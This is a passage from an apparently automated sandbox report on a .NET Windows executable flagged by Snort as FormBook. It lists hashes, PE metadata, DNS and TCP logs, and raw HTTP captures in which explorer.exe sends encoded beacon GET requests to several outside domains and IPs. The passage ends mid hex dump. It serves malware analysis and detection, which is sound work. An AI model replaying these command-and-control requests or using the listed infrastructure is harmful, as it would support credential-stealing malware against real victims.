                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview: [ZoneTransfer]....ZoneId=0

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.730510176351769
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:ejecutable2.exe
                                                        File size:834048
                                                        MD5:2d359d2c999ccb15bc71229bb0275bb6
                                                        SHA1:5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
                                                        SHA256:5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf
                                                        SHA512:e318c5195d333d0a894d7838bdab866fdf138e9fbdef18e68612738b0771eae0391aa8613f326ecc2ecf9782555e619d32bca083331923ede400316d08559018
                                                        SSDEEP:12288:2ycxsoImFamoF83NIcTob0wOSHqQLfCtKbAG4fgmPywW4MaGhgv2totS7Ly319MC:7TcIFfzLr25+HFqM3sxR7WjYF+ja+i
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0.. ..........>?... ...@....@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:138e8eccece8cccc

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4b3f3e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x61514E89 [Mon Sep 27 04:54:33 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb3eec0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x19434.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xb1f440xb2000False0.666606774491data6.99221568577IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xb40000x194340x19600False0.391712207512data4.29577228612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xce0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0xb41800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                        RT_ICON0xc49b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                        RT_ICON0xc8bf00x25a8data
                                                        RT_ICON0xcb1a80x10a8data
                                                        RT_ICON0xcc2600x468GLS_BINARY_LSB_FIRST
                                                        RT_GROUP_ICON0xcc6d80x4cdata
                                                        RT_VERSION0xcc7340x33cdata
                                                        RT_MANIFEST0xcca800x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright F@Soft
                                                        Assembly Version1.0.6.2
                                                        InternalNameUIntPtrTypeIn.exe
                                                        FileVersion1.0.6.0
                                                        CompanyNameF@Soft
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameDarwin AW
                                                        ProductVersion1.0.6.0
                                                        FileDescriptionDarwin AW
                                                        OriginalFilenameUIntPtrTypeIn.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        09/27/21-17:39:07.055090TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2235.168.81.157
                                                        09/27/21-17:39:07.055090TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2235.168.81.157
                                                        09/27/21-17:39:07.055090TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.2235.168.81.157
                                                        09/27/21-17:39:22.562083TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                        09/27/21-17:39:22.562083TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                        09/27/21-17:39:22.562083TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917180192.168.2.2234.102.136.180
                                                        09/27/21-17:39:22.675501TCP1201ATTACK-RESPONSES 403 Forbidden804917134.102.136.180192.168.2.22

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2021 17:38:56.608946085 CEST4916780192.168.2.223.223.115.185
                                                        Sep 27, 2021 17:38:56.710228920 CEST80491673.223.115.185192.168.2.22
                                                        Sep 27, 2021 17:38:56.710319996 CEST4916780192.168.2.223.223.115.185
                                                        Sep 27, 2021 17:38:56.713388920 CEST4916780192.168.2.223.223.115.185
                                                        Sep 27, 2021 17:38:56.814147949 CEST80491673.223.115.185192.168.2.22
                                                        Sep 27, 2021 17:38:56.814301968 CEST4916780192.168.2.223.223.115.185
                                                        Sep 27, 2021 17:38:56.814359903 CEST4916780192.168.2.223.223.115.185
                                                        Sep 27, 2021 17:38:56.914864063 CEST80491673.223.115.185192.168.2.22
                                                        Sep 27, 2021 17:39:06.953140974 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.054691076 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.054817915 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.055089951 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.156269073 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158337116 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158396006 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158428907 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158556938 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158584118 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:07.158623934 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.158816099 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.158935070 CEST4916880192.168.2.2235.168.81.157
                                                        Sep 27, 2021 17:39:07.259896994 CEST804916835.168.81.157192.168.2.22
                                                        Sep 27, 2021 17:39:12.252114058 CEST4916980192.168.2.22195.77.116.8
                                                        Sep 27, 2021 17:39:12.313489914 CEST8049169195.77.116.8192.168.2.22
                                                        Sep 27, 2021 17:39:12.313558102 CEST4916980192.168.2.22195.77.116.8
                                                        Sep 27, 2021 17:39:12.313704967 CEST4916980192.168.2.22195.77.116.8
                                                        Sep 27, 2021 17:39:12.375854015 CEST8049169195.77.116.8192.168.2.22
                                                        Sep 27, 2021 17:39:12.386595964 CEST8049169195.77.116.8192.168.2.22
                                                        Sep 27, 2021 17:39:12.386697054 CEST8049169195.77.116.8192.168.2.22
                                                        Sep 27, 2021 17:39:12.386897087 CEST4916980192.168.2.22195.77.116.8
                                                        Sep 27, 2021 17:39:12.432111025 CEST4916980192.168.2.22195.77.116.8
                                                        Sep 27, 2021 17:39:12.493889093 CEST8049169195.77.116.8192.168.2.22
                                                        Sep 27, 2021 17:39:17.464262962 CEST4917080192.168.2.22217.160.0.222
                                                        Sep 27, 2021 17:39:17.483882904 CEST8049170217.160.0.222192.168.2.22
                                                        Sep 27, 2021 17:39:17.484036922 CEST4917080192.168.2.22217.160.0.222
                                                        Sep 27, 2021 17:39:17.484231949 CEST4917080192.168.2.22217.160.0.222
                                                        Sep 27, 2021 17:39:17.503827095 CEST8049170217.160.0.222192.168.2.22
                                                        Sep 27, 2021 17:39:17.509183884 CEST8049170217.160.0.222192.168.2.22
                                                        Sep 27, 2021 17:39:17.509215117 CEST8049170217.160.0.222192.168.2.22
                                                        Sep 27, 2021 17:39:17.509506941 CEST4917080192.168.2.22217.160.0.222
                                                        Sep 27, 2021 17:39:17.509589911 CEST4917080192.168.2.22217.160.0.222
                                                        Sep 27, 2021 17:39:17.531337023 CEST8049170217.160.0.222192.168.2.22
                                                        Sep 27, 2021 17:39:22.549463987 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.561580896 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:22.561748981 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.562083006 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.573887110 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:22.675501108 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:22.675894022 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:22.675930977 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.675959110 CEST4917180192.168.2.2234.102.136.180
                                                        Sep 27, 2021 17:39:22.688532114 CEST804917134.102.136.180192.168.2.22
                                                        Sep 27, 2021 17:39:27.756493092 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.778821945 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.778943062 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.779182911 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.801886082 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804255962 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804285049 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:27.804548025 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.804605961 CEST4917280192.168.2.2281.169.145.77
                                                        Sep 27, 2021 17:39:27.826710939 CEST804917281.169.145.77192.168.2.22
                                                        Sep 27, 2021 17:39:32.899960041 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.946930885 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:32.947105885 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.950460911 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:32.997994900 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.020418882 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.023408890 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:33.024389982 CEST80491735.101.152.161192.168.2.22
                                                        Sep 27, 2021 17:39:33.027858973 CEST4917380192.168.2.225.101.152.161
                                                        Sep 27, 2021 17:39:33.070858955 CEST80491735.101.152.161192.168.2.22

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 27, 2021 17:38:56.473535061 CEST5216753192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:38:56.594779968 CEST53521678.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:06.823992968 CEST5059153192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:06.951486111 CEST53505918.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:12.190723896 CEST5780553192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:12.248907089 CEST53578058.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:17.432555914 CEST5903053192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:17.463222027 CEST53590308.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:22.518026114 CEST5918553192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:22.548149109 CEST53591858.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:27.712830067 CEST5561653192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:27.755270004 CEST53556168.8.8.8192.168.2.22
                                                        Sep 27, 2021 17:39:32.814937115 CEST4997253192.168.2.228.8.8.8
                                                        Sep 27, 2021 17:39:32.898519993 CEST53499728.8.8.8192.168.2.22

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Sep 27, 2021 17:38:56.473535061 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.tunetel.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:06.823992968 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.branchwallet.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:12.190723896 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.iptechcm.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:17.432555914 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.pizza-mio.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:22.518026114 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.wwiilive.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:27.712830067 CEST192.168.2.228.8.8.80x9037Standard query (0)www.play-to-escape.comA (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:32.814937115 CEST192.168.2.228.8.8.80xce43Standard query (0)www.yhomggsmtdynchb.storeA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Sep 27, 2021 17:38:56.594779968 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.tunetel.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                        Sep 27, 2021 17:38:56.594779968 CEST8.8.8.8192.168.2.220x8eb8No error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:06.951486111 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.branchwallet.comcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)
                                                        Sep 27, 2021 17:39:06.951486111 CEST8.8.8.8192.168.2.220xc18cNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                        Sep 27, 2021 17:39:06.951486111 CEST8.8.8.8192.168.2.220xc18cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com35.168.81.157A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:06.951486111 CEST8.8.8.8192.168.2.220xc18cNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.85.93.188A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:12.248907089 CEST8.8.8.8192.168.2.220xfc43No error (0)www.iptechcm.com195.77.116.8A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:17.463222027 CEST8.8.8.8192.168.2.220x9c63No error (0)www.pizza-mio.com217.160.0.222A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:22.548149109 CEST8.8.8.8192.168.2.220x30e0No error (0)www.wwiilive.comwwiilive.comCNAME (Canonical name)IN (0x0001)
                                                        Sep 27, 2021 17:39:22.548149109 CEST8.8.8.8192.168.2.220x30e0No error (0)wwiilive.com34.102.136.180A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:27.755270004 CEST8.8.8.8192.168.2.220x9037No error (0)www.play-to-escape.complay-to-escape.comCNAME (Canonical name)IN (0x0001)
                                                        Sep 27, 2021 17:39:27.755270004 CEST8.8.8.8192.168.2.220x9037No error (0)play-to-escape.com81.169.145.77A (IP address)IN (0x0001)
                                                        Sep 27, 2021 17:39:32.898519993 CEST8.8.8.8192.168.2.220xce43No error (0)www.yhomggsmtdynchb.store5.101.152.161A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.tunetel.com
                                                        • www.branchwallet.com
                                                        • www.iptechcm.com
                                                        • www.pizza-mio.com
                                                        • www.wwiilive.com
                                                        • www.play-to-escape.com
                                                        • www.yhomggsmtdynchb.store

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.22491673.223.115.18580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:38:56.713388920 CEST0OUTGET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.tunetel.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:38:56.814147949 CEST1INHTTP/1.1 302 Found
                                                        Cache-Control: private
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: https://www.hugedomains.com/domain_profile.cfm?d=tunetel&e=com
                                                        Server: Microsoft-IIS/8.5
                                                        X-Powered-By: ASP.NET
                                                        Date: Mon, 27 Sep 2021 15:38:18 GMT
                                                        Connection: close
                                                        Content-Length: 183
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 74 75 6e 65 74 65 6c 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=tunetel&amp;e=com">here</a>.</h2></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.224916835.168.81.15780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Sep 27, 2021 17:39:07.055089951 CEST2OUTGET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1
                                                        Host: www.branchwallet.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Sep 27, 2021 17:39:07.158337116 CEST3INHTTP/1.1 200 OK
                                                        Date: Mon, 27 Sep 2021 15:39:07 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 34 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 